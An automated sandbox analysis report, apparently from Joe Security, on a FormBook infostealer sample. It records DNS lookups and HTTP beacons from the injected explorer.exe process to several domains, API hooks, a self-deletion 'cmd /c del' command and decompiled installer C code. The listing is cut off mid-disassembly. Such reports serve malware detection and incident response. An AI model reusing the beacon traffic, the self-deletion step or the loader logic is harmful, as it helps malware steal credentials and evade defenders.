                                                                                      Jun 11, 2021 13:17:07.093458891 CEST8.8.8.8192.168.2.30xb120No error (0)www.vacalinda.comghs.googlehosted.comCNAME (Canonical name)IN (0x0001)
                                                                                      Jun 11, 2021 13:17:07.093458891 CEST8.8.8.8192.168.2.30xb120No error (0)ghs.googlehosted.com142.250.180.243A (IP address)IN (0x0001)
                                                                                      Jun 11, 2021 13:17:26.350822926 CEST8.8.8.8192.168.2.30xc82dNo error (0)www.servicesbackyard.comparking.namesilo.comCNAME (Canonical name)IN (0x0001)
                                                                                      Jun 11, 2021 13:17:26.350822926 CEST8.8.8.8192.168.2.30xc82dNo error (0)parking.namesilo.com168.235.88.209A (IP address)IN (0x0001)
                                                                                      Jun 11, 2021 13:17:26.350822926 CEST8.8.8.8192.168.2.30xc82dNo error (0)parking.namesilo.com107.161.23.204A (IP address)IN (0x0001)
                                                                                      Jun 11, 2021 13:17:26.350822926 CEST8.8.8.8192.168.2.30xc82dNo error (0)parking.namesilo.com209.141.38.71A (IP address)IN (0x0001)
                                                                                      Jun 11, 2021 13:17:26.350822926 CEST8.8.8.8192.168.2.30xc82dNo error (0)parking.namesilo.com188.164.131.200A (IP address)IN (0x0001)
                                                                                      Jun 11, 2021 13:17:26.350822926 CEST8.8.8.8192.168.2.30xc82dNo error (0)parking.namesilo.com198.251.81.30A (IP address)IN (0x0001)
                                                                                      Jun 11, 2021 13:17:26.350822926 CEST8.8.8.8192.168.2.30xc82dNo error (0)parking.namesilo.com70.39.125.244A (IP address)IN (0x0001)
                                                                                      Jun 11, 2021 13:17:26.350822926 CEST8.8.8.8192.168.2.30xc82dNo error (0)parking.namesilo.com204.188.203.155A (IP address)IN (0x0001)
                                                                                      Jun 11, 2021 13:17:26.350822926 CEST8.8.8.8192.168.2.30xc82dNo error (0)parking.namesilo.com45.58.190.82A (IP address)IN (0x0001)
                                                                                      Jun 11, 2021 13:17:26.350822926 CEST8.8.8.8192.168.2.30xc82dNo error (0)parking.namesilo.com192.161.187.200A (IP address)IN (0x0001)
                                                                                      Jun 11, 2021 13:17:26.350822926 CEST8.8.8.8192.168.2.30xc82dNo error (0)parking.namesilo.com198.251.84.92A (IP address)IN (0x0001)
                                                                                      Jun 11, 2021 13:17:26.350822926 CEST8.8.8.8192.168.2.30xc82dNo error (0)parking.namesilo.com64.32.22.102A (IP address)IN (0x0001)
                                                                                      Jun 11, 2021 13:17:46.941773891 CEST8.8.8.8192.168.2.30xade4No error (0)www.djspencer.com159.89.244.183A (IP address)IN (0x0001)
                                                                                      Jun 11, 2021 13:17:46.941773891 CEST8.8.8.8192.168.2.30xade4No error (0)www.djspencer.com164.90.244.158A (IP address)IN (0x0001)
                                                                                      Jun 11, 2021 13:18:09.452832937 CEST8.8.8.8192.168.2.30xd817No error (0)www.caravansforsalenorthwales.comcaravansforsalenorthwales.comCNAME (Canonical name)IN (0x0001)
                                                                                      Jun 11, 2021 13:18:09.452832937 CEST8.8.8.8192.168.2.30xd817No error (0)caravansforsalenorthwales.com34.102.136.180A (IP address)IN (0x0001)

                                                                                      HTTP Request Dependency Graph

                                                                                      • www.vacalinda.com
                                                                                      • www.servicesbackyard.com
                                                                                      • www.djspencer.com
                                                                                      • www.caravansforsalenorthwales.com

                                                                                      HTTP Packets

                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                      0192.168.2.349733142.250.180.24380C:\Windows\explorer.exe
                                                                                      TimestampkBytes transferredDirectionData
                                                                                      Jun 11, 2021 13:17:07.160631895 CEST1261OUTGET /ngvm/?w6A=st23zvU/E1xU5Qy7Hp2PD30UnMfCa5knANSLf3ItiB6oVvQd6+qg6yvUWRtcyiXbPLds&3fox=SBZ4 HTTP/1.1
                                                                                      Host: www.vacalinda.com
                                                                                      Connection: close
                                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                                      Data Ascii:
                                                                                      Jun 11, 2021 13:17:07.244602919 CEST1262INHTTP/1.1 301 Moved Permanently
                                                                                      Location: http://www.vacalinda.cl
                                                                                      Date: Fri, 11 Jun 2021 11:17:07 GMT
                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                      Server: ghs
                                                                                      Content-Length: 220
                                                                                      X-XSS-Protection: 0
                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                      Connection: close
                                                                                      Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 54 49 54 4c 45 3e 33 30 31 20 4d 6f 76 65 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 33 30 31 20 4d 6f 76 65 64 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 0a 3c 41 20 48 52 45 46 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 76 61 63 61 6c 69 6e 64 61 2e 63 6c 22 3e 68 65 72 65 3c 2f 41 3e 2e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                                                      Data Ascii: <HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8"><TITLE>301 Moved</TITLE></HEAD><BODY><H1>301 Moved</H1>The document has moved<A HREF="http://www.vacalinda.cl">here</A>.</BODY></HTML>


                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                      1192.168.2.349740168.235.88.20980C:\Windows\explorer.exe
                                                                                      TimestampkBytes transferredDirectionData
                                                                                      Jun 11, 2021 13:17:26.479172945 CEST5247OUTGET /ngvm/?w6A=UyLqygKx2FmdGYSRh5mqmU7zHOPmyh0H52xSnc3cVgCKFPBqoRmOJ0eYguKTgHZNEA4k&3fox=SBZ4 HTTP/1.1
                                                                                      Host: www.servicesbackyard.com
                                                                                      Connection: close
                                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                                      Data Ascii:
                                                                                      Jun 11, 2021 13:17:26.604996920 CEST5247INHTTP/1.1 302 Moved Temporarily
                                                                                      Server: nginx
                                                                                      Date: Fri, 11 Jun 2021 11:17:26 GMT
                                                                                      Content-Type: text/html
                                                                                      Content-Length: 154
                                                                                      Connection: close
                                                                                      Location: http://www.servicesbackyard.com?w6A=UyLqygKx2FmdGYSRh5mqmU7zHOPmyh0H52xSnc3cVgCKFPBqoRmOJ0eYguKTgHZNEA4k&3fox=SBZ4
                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                      Data Ascii: <html><head><title>302 Found</title></head><body bgcolor="white"><center><h1>302 Found</h1></center><hr><center>nginx</center></body></html>


                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                      2192.168.2.349741159.89.244.18380C:\Windows\explorer.exe
                                                                                      TimestampkBytes transferredDirectionData
                                                                                      Jun 11, 2021 13:17:47.071191072 CEST5251OUTGET /ngvm/?w6A=HBVp1ZFUGcT+hxfW3ntFEbmU5GO8vrkA1mLmG5vd048TCTgwy52mAcu3AE2RaU7PuRfb&3fox=SBZ4 HTTP/1.1
                                                                                      Host: www.djspencer.com
                                                                                      Connection: close
                                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                                      Data Ascii:
                                                                                      Jun 11, 2021 13:17:47.198865891 CEST5252INHTTP/1.1 301 Moved Permanently
                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                      Date: Fri, 11 Jun 2021 11:17:47 GMT
                                                                                      Content-Type: text/html
                                                                                      Content-Length: 178
                                                                                      Connection: close
                                                                                      Location: https://perfectdomain.com/domain/djspencer.com
                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                      Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>


                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                      3192.168.2.34974434.102.136.18080C:\Windows\explorer.exe
                                                                                      TimestampkBytes transferredDirectionData
                                                                                      Jun 11, 2021 13:18:09.496512890 CEST5271OUTGET /ngvm/?w6A=uz7CW46zGnQqpjgqznnFmpPrWAklZoEybcG+oUJN9dvYL4OpOEr/HbmCuGHk2zZbqVpb&3fox=SBZ4 HTTP/1.1
                                                                                      Host: www.caravansforsalenorthwales.com
                                                                                      Connection: close
                                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                                      Data Ascii:
                                                                                      Jun 11, 2021 13:18:09.635601997 CEST5271INHTTP/1.1 403 Forbidden
                                                                                      Server: openresty
                                                                                      Date: Fri, 11 Jun 2021 11:18:09 GMT
                                                                                      Content-Type: text/html
                                                                                      Content-Length: 275
                                                                                      ETag: "60c03ab8-113"
                                                                                      Via: 1.1 google
                                                                                      Connection: close
                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                                      Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                                      Code Manipulations

                                                                                      User Modules

                                                                                      Hook Summary

                                                                                      Function NameHook TypeActive in Processes
                                                                                      PeekMessageAINLINEexplorer.exe
                                                                                      PeekMessageWINLINEexplorer.exe
                                                                                      GetMessageWINLINEexplorer.exe
                                                                                      GetMessageAINLINEexplorer.exe

                                                                                      Processes

                                                                                      Process: explorer.exe, Module: user32.dll
                                                                                      Function NameHook TypeNew Data
                                                                                      PeekMessageAINLINE0x48 0x8B 0xB8 0x8A 0xAE 0xED
                                                                                      PeekMessageWINLINE0x48 0x8B 0xB8 0x82 0x2E 0xED
                                                                                      GetMessageWINLINE0x48 0x8B 0xB8 0x82 0x2E 0xED
                                                                                      GetMessageAINLINE0x48 0x8B 0xB8 0x8A 0xAE 0xED

                                                                                      Statistics

                                                                                      CPU Usage

                                                                                      Click to jump to process

                                                                                      Memory Usage

                                                                                      Click to jump to process

                                                                                      High Level Behavior Distribution

                                                                                      Click to dive into process behavior distribution

                                                                                      Behavior

                                                                                      Click to jump to process

                                                                                      System Behavior

                                                                                      Analysis Process: SX365783909782021.exe PID: 4092 Parent PID: 5660

                                                                                      General

                                                                                      Start time:13:16:05
                                                                                      Start date:11/06/2021
                                                                                      Path:C:\Users\user\Desktop\SX365783909782021.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:'C:\Users\user\Desktop\SX365783909782021.exe'
                                                                                      Imagebase:0x400000
                                                                                      File size:245880 bytes
                                                                                      MD5 hash:EE1F4A07B874AA6BA18D6AA0F83252D3
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Yara matches:
                                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.211210535.00000000022B0000.00000004.00000001.sdmp, Author: Joe Security
                                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.211210535.00000000022B0000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.211210535.00000000022B0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                      Reputation:low

                                                                                      Chronological Activities

                                                                                      Analysis Process: SX365783909782021.exe PID: 5472 Parent PID: 4092

                                                                                      General

                                                                                      Start time:13:16:06
                                                                                      Start date:11/06/2021
                                                                                      Path:C:\Users\user\Desktop\SX365783909782021.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:'C:\Users\user\Desktop\SX365783909782021.exe'
                                                                                      Imagebase:0x400000
                                                                                      File size:245880 bytes
                                                                                      MD5 hash:EE1F4A07B874AA6BA18D6AA0F83252D3
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Yara matches:
                                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.258574044.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.258574044.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.258574044.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000001.209804420.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000001.209804420.0000000000400000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000001.209804420.0000000000400000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.258786803.00000000005B0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.258786803.00000000005B0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.258786803.00000000005B0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.258837957.0000000000710000.00000040.00000001.sdmp, Author: Joe Security
                                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.258837957.0000000000710000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.258837957.0000000000710000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                      Reputation:low

                                                                                      Chronological Activities

                                                                                      Analysis Process: explorer.exe PID: 3388 Parent PID: 5472

                                                                                      General

                                                                                      Start time:13:16:10
                                                                                      Start date:11/06/2021
                                                                                      Path:C:\Windows\explorer.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:
                                                                                      Imagebase:0x7ff714890000
                                                                                      File size:3933184 bytes
                                                                                      MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high

                                                                                      Chronological Activities

                                                                                      Analysis Process: help.exe PID: 5524 Parent PID: 3388

                                                                                      General

                                                                                      Start time:13:16:28
                                                                                      Start date:11/06/2021
                                                                                      Path:C:\Windows\SysWOW64\help.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:C:\Windows\SysWOW64\help.exe
                                                                                      Imagebase:0xbb0000
                                                                                      File size:10240 bytes
                                                                                      MD5 hash:09A715036F14D3632AD03B52D1DA6BFF
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Yara matches:
                                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.473754310.0000000003200000.00000040.00000001.sdmp, Author: Joe Security
                                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.473754310.0000000003200000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.473754310.0000000003200000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.472090660.0000000000C30000.00000004.00000001.sdmp, Author: Joe Security
                                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.472090660.0000000000C30000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.472090660.0000000000C30000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                      Reputation:moderate

                                                                                      Chronological Activities

                                                                                      Analysis Process: cmd.exe PID: 6124 Parent PID: 5524

                                                                                      General

                                                                                      Start time:13:16:32
                                                                                      Start date:11/06/2021
                                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:/c del 'C:\Users\user\Desktop\SX365783909782021.exe'
                                                                                      Imagebase:0x200000
                                                                                      File size:232960 bytes
                                                                                      MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high

                                                                                      Chronological Activities

                                                                                      Analysis Process: conhost.exe PID: 4720 Parent PID: 6124

                                                                                      General

                                                                                      Start time:13:16:33
                                                                                      Start date:11/06/2021
                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                      Imagebase:0x7ff6b2800000
                                                                                      File size:625664 bytes
                                                                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high

                                                                                      Chronological Activities

                                                                                      Disassembly

                                                                                      Code Analysis

                                                                                      Reset < >

                                                                                        Analysis Process: SX365783909782021.exe PID: 4092 Parent PID: 5660 SX365783909782021.exeCOMMON

                                                                                        Executed Functions

                                                                                        Function 0040323C, Relevance: 70.3, APIs: 23, Strings: 17, Instructions: 270filestringcomCOMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 82%
                                                                                        			_entry_() {
				struct _SHFILEINFOA _v360;
				struct _SECURITY_ATTRIBUTES* _v376;
				char _v380;
				CHAR* _v384;
				char _v396;
				int _v400;
				int _v404;
				CHAR* _v408;
				intOrPtr _v412;
				int _v416;
				intOrPtr _v420;
				struct _SECURITY_ATTRIBUTES* _v424;
				void* _v432;
				int _t34;
				CHAR* _t39;
				char* _t42;
				signed int _t44;
				void* _t48;
				intOrPtr _t50;
				signed int _t52;
				signed int _t55;
				int _t56;
				signed int _t60;
				void* _t79;
				void* _t89;
				void* _t91;
				char* _t96;
				signed int _t97;
				void* _t98;
				signed int _t99;
				signed int _t100;
				signed int _t103;
				CHAR* _t105;
				signed int _t106;
				char _t120;

				_v376 = 0;
				_v384 = "Error writing temporary file. Make sure your temp folder is valid.";
				_t99 = 0;
				_v380 = 0x20;
				__imp__#17();
				_t34 = SetErrorMode(0x8001); // executed
				__imp__OleInitialize(0); // executed
				 *0x423f58 = _t34;
				 *0x423ea4 = E00405E88(8);
				SHGetFileInfoA(0x41f458, 0,  &_v360, 0x160, 0); // executed
				E00405B66(0x4236a0, "NSIS Error");
				_t39 = GetCommandLineA();
				_t96 = "\"C:\\Users\\hardz\\Desktop\\SX365783909782021.exe\" ";
				E00405B66(_t96, _t39);
				 *0x423ea0 = GetModuleHandleA(0);
				_t42 = _t96;
				if("\"C:\\Users\\hardz\\Desktop\\SX365783909782021.exe\" " == 0x22) {
					_v404 = 0x22;
					_t42 =  &M00429001;
				}
				_t44 = CharNextA(E00405684(_t42, _v404));
				_v404 = _t44;
				while(1) {
					_t91 =  *_t44;
					_t109 = _t91;
					if(_t91 == 0) {
						break;
					}
					__eflags = _t91 - 0x20;
					if(_t91 != 0x20) {
						L5:
						__eflags =  *_t44 - 0x22;
						_v404 = 0x20;
						if( *_t44 == 0x22) {
							_t44 = _t44 + 1;
							__eflags = _t44;
							_v404 = 0x22;
						}
						__eflags =  *_t44 - 0x2f;
						if( *_t44 != 0x2f) {
							L15:
							_t44 = E00405684(_t44, _v404);
							__eflags =  *_t44 - 0x22;
							if(__eflags == 0) {
								_t44 = _t44 + 1;
								__eflags = _t44;
							}
							continue;
						} else {
							_t44 = _t44 + 1;
							__eflags =  *_t44 - 0x53;
							if( *_t44 == 0x53) {
								__eflags = ( *(_t44 + 1) | 0x00000020) - 0x20;
								if(( *(_t44 + 1) | 0x00000020) == 0x20) {
									_t99 = _t99 | 0x00000002;
									__eflags = _t99;
								}
							}
							__eflags =  *_t44 - 0x4352434e;
							if( *_t44 == 0x4352434e) {
								__eflags = ( *(_t44 + 4) | 0x00000020) - 0x20;
								if(( *(_t44 + 4) | 0x00000020) == 0x20) {
									_t99 = _t99 | 0x00000004;
									__eflags = _t99;
								}
							}
							__eflags =  *((intOrPtr*)(_t44 - 2)) - 0x3d442f20;
							if( *((intOrPtr*)(_t44 - 2)) == 0x3d442f20) {
								 *((intOrPtr*)(_t44 - 2)) = 0;
								__eflags = _t44 + 2;
								E00405B66("C:\\Users\\hardz\\AppData\\Local\\Temp", _t44 + 2);
								L20:
								_t105 = "C:\\Users\\hardz\\AppData\\Local\\Temp\\";
								GetTempPathA(0x400, _t105);
								_t48 = E00403208(_t109);
								_t110 = _t48;
								if(_t48 != 0) {
									L22:
									DeleteFileA("1033"); // executed
									_t50 = E00402C72(_t111, _t99); // executed
									_v412 = _t50;
									if(_t50 != 0) {
										L32:
										E004035BD();
										__imp__OleUninitialize();
										if(_v408 == 0) {
											__eflags =  *0x423f34;
											if( *0x423f34 != 0) {
												_t106 = E00405E88(3);
												_t100 = E00405E88(4);
												_t55 = E00405E88(5);
												__eflags = _t106;
												_t97 = _t55;
												if(_t106 != 0) {
													__eflags = _t100;
													if(_t100 != 0) {
														__eflags = _t97;
														if(_t97 != 0) {
															_t60 =  *_t106(GetCurrentProcess(), 0x28,  &_v396);
															__eflags = _t60;
															if(_t60 != 0) {
																 *_t100(0, "SeShutdownPrivilege",  &_v400);
																_v416 = 1;
																_v404 = 2;
																 *_t97(_v420, 0,  &_v416, 0, 0, 0);
															}
														}
													}
												}
												_t56 = ExitWindowsEx(2, 0);
												__eflags = _t56;
												if(_t56 == 0) {
													E0040140B(9);
												}
											}
											_t52 =  *0x423f4c;
											__eflags = _t52 - 0xffffffff;
											if(_t52 != 0xffffffff) {
												_v400 = _t52;
											}
											ExitProcess(_v400);
										}
										E00405427(_v408, 0x200010);
										ExitProcess(2);
									}
									if( *0x423ebc == 0) {
										L31:
										 *0x423f4c =  *0x423f4c | 0xffffffff;
										_v400 = E004036AF();
										goto L32;
									}
									_t103 = E00405684(_t96, 0);
									while(_t103 >= _t96) {
										__eflags =  *_t103 - 0x3d3f5f20;
										if(__eflags == 0) {
											break;
										}
										_t103 = _t103 - 1;
										__eflags = _t103;
									}
									_t115 = _t103 - _t96;
									_v408 = "Error launching installer";
									if(_t103 < _t96) {
										lstrcatA(_t105, "~nsu.tmp");
										if(lstrcmpiA(_t105, "C:\\Users\\hardz\\Desktop") == 0) {
											goto L32;
										}
										CreateDirectoryA(_t105, 0);
										SetCurrentDirectoryA(_t105);
										_t120 = "C:\\Users\\hardz\\AppData\\Local\\Temp"; // 0x43
										if(_t120 == 0) {
											E00405B66("C:\\Users\\hardz\\AppData\\Local\\Temp", "C:\\Users\\hardz\\Desktop");
										}
										E00405B66(0x424000, _v396);
										 *0x424400 = 0x41;
										_t98 = 0x1a;
										do {
											E00405B88(0, _t98, 0x41f058, 0x41f058,  *((intOrPtr*)( *0x423eb0 + 0x120)));
											DeleteFileA(0x41f058);
											if(_v416 != 0 && CopyFileA("C:\\Users\\hardz\\Desktop\\SX365783909782021.exe", 0x41f058, 1) != 0) {
												_push(0);
												_push(0x41f058);
												E004058B4();
												E00405B88(0, _t98, 0x41f058, 0x41f058,  *((intOrPtr*)( *0x423eb0 + 0x124)));
												_t79 = E004053C6(0x41f058);
												if(_t79 != 0) {
													CloseHandle(_t79);
													_v416 = 0;
												}
											}
											 *0x424400 =  *0x424400 + 1;
											_t98 = _t98 - 1;
										} while (_t98 != 0);
										_push(0);
										_push(_t105);
										E004058B4();
										goto L32;
									}
									 *_t103 = 0;
									_t104 = _t103 + 4;
									if(E0040573A(_t115, _t103 + 4) == 0) {
										goto L32;
									}
									E00405B66("C:\\Users\\hardz\\AppData\\Local\\Temp", _t104);
									E00405B66("C:\\Users\\hardz\\AppData\\Local\\Temp", _t104);
									_v424 = 0;
									goto L31;
								}
								GetWindowsDirectoryA(_t105, 0x3fb);
								lstrcatA(_t105, "\\Temp");
								_t89 = E00403208(_t110);
								_t111 = _t89;
								if(_t89 == 0) {
									goto L32;
								}
								goto L22;
							}
							goto L15;
						}
					} else {
						goto L4;
					}
					do {
						L4:
						_t44 = _t44 + 1;
						__eflags =  *_t44 - 0x20;
					} while ( *_t44 == 0x20);
					goto L5;
				}
				goto L20;
			}






































                                                                                        0x00403248
                                                                                        0x0040324c
                                                                                        0x00403254
                                                                                        0x00403256
                                                                                        0x0040325b
                                                                                        0x00403266
                                                                                        0x0040326d
                                                                                        0x00403275
                                                                                        0x0040327f
                                                                                        0x00403295
                                                                                        0x004032a5
                                                                                        0x004032aa
                                                                                        0x004032b0
                                                                                        0x004032b7
                                                                                        0x004032ca
                                                                                        0x004032cf
                                                                                        0x004032d1
                                                                                        0x004032d3
                                                                                        0x004032d8
                                                                                        0x004032d8
                                                                                        0x004032e8
                                                                                        0x004032ee
                                                                                        0x00403357
                                                                                        0x00403357
                                                                                        0x00403359
                                                                                        0x0040335b
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x004032f4
                                                                                        0x004032f7
                                                                                        0x004032ff
                                                                                        0x004032ff
                                                                                        0x00403302
                                                                                        0x00403307
                                                                                        0x00403309
                                                                                        0x00403309
                                                                                        0x0040330a
                                                                                        0x0040330a
                                                                                        0x0040330f
                                                                                        0x00403312
                                                                                        0x00403347
                                                                                        0x0040334c
                                                                                        0x00403351
                                                                                        0x00403354
                                                                                        0x00403356
                                                                                        0x00403356
                                                                                        0x00403356
                                                                                        0x00000000
                                                                                        0x00403314
                                                                                        0x00403314
                                                                                        0x00403315
                                                                                        0x00403318
                                                                                        0x00403320
                                                                                        0x00403323
                                                                                        0x00403325
                                                                                        0x00403325
                                                                                        0x00403325
                                                                                        0x00403323
                                                                                        0x00403328
                                                                                        0x0040332e
                                                                                        0x00403336
                                                                                        0x00403339
                                                                                        0x0040333b
                                                                                        0x0040333b
                                                                                        0x0040333b
                                                                                        0x00403339
                                                                                        0x0040333e
                                                                                        0x00403345
                                                                                        0x0040335f
                                                                                        0x00403362
